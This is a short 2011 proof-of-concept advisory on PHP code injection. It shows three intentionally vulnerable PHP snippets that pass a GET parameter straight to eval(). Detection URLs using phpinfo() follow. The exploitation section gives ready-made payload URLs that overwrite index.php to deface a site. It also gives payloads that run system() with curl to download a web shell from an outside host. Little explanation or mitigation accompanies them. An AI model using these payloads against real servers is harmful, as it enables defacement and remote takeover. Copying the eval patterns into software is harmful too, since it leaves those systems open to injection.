|===============================================================================================| |-----> [ID] : [SSB00000] | |-----> [Title] : [PoC of PHP Code Injection] | |-----> [Criticality] : [High] | |-----> [Email] : [ssbostan@gmail.com] | |-----> [Date] : [18/07/2011] | |===============================================================================================| ######################################################################################### BOF ### ### Introduction + + PCI is a type of vulnerability in php language and allows attacker to inject php codes. + two types of PCI attacks are: + 1- Inject PHP code in PHP Code (if use eval() function) + 2- Inject Code in used function area (if use another functions) + + in the first method you can use each of php functions for attacking. + + for example: + you can use include(), system() functions or another in eval() function. + + but + + in the second method you can just use orders that in used function area. + + for example: + if source used system() function you can just execute command such as RCE method. + or + if source used include() function you can just include pages such as RFI method. + + Attention: + because all methods of second method have specified name, the first method is PCI..!!! + + + + ### Vulnerable source codes + + We have three sample codes for proof of concept. + + PoC1 (5 line): + + <?php + $how=$_GET['how']; + $how=stripslashes($how); + eval($how); + ?> + + PoC2 (6 line): + + <?php + $how=$_GET['how']; + $how=preg_replace_callback("/(<\?=)(.*?)\?>/si",create_function('$how','ob_start();eval("$how[2];");$return=ob_get_contents();ob_end_clean();return $return;'),$how); + $how=preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$how','ob_start();eval("print $how[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$how); + echo $how; + ?> + + PoC3 (5 line): + + <?php + $how=$_GET['how']; + $how=stripslashes($how); + eval('?>'.$how); + ?> + + + + ### Detection + + PoC1: + http://website.com/page.php?how=phpinfo(); + + PoC2: + http://website.com/page.php?how=<? phpinfo(); ?> + + PoC3: + http://website.com/page.php?how=<? phpinfo(); + + results: show server phpinfo page. + + + + ### Exploiting + + Create deface page: + + http://website.com/page.php?how=$def=fopen("index.php",'w');fwrite($def,("defaced.!!!"));fclose($def); + or + http://website.com/page.php?how=<?php $def=fopen("index.php",'w');fwrite($def,("defaced.!!!"));fclose($def); ?> + or + http://website.com/page.php?how=<?php $def=fopen("index.php",'w');fwrite($def,("defaced.!!!"));fclose($def); + + Create shell: + + http://website.com/page.php?how=system("curl http://shellcode.com/shell.txt -o shell.php"); + or + http://website.com/page.php?how=<?php system("curl http://shellcode.com/shell.txt -o shell.php"); ?> + or + http://website.com/page.php?how=<?php system("curl http://shellcode.com/shell.txt -o shell.php"); + + + + ######################################################################################### EOF ###